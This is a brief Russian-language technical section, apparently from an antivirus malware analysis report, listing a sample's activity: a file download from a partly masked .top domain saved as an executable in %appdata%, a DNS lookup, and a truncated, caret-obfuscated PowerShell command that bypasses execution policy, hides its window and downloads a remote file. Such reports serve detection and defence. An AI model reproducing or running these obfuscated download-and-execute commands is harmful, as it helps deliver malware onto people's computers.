Техническая информация
- http://fo###repu.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powErSHeL^L^.e^X^e -^e^x^ecutiOnpO^Li^cy bY^P^asS ^-no^p^r^of^IlE^ -WiNdo^w^sTy^L^e HiDdEN (^New-OBJECT S^yStEM^.^NET.w^Eb^c^LIENt).DOW^nLOa^D^fI^l^E('http://fo###repu.top/read...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "powErSHeL^L^.e^X^e -^e^x^ecutiOnpO^Li^cy bY^P^asS ^-no^p^r^of^IlE^ -WiNdo^w^sTy^L^e HiDdEN (^New-OBJECT S^yStEM^.^NET.w^Eb^c^LIENt).DOW^nLOa^D^fI^l^E('http://fo###repu.top/read...' (со скрытым окном)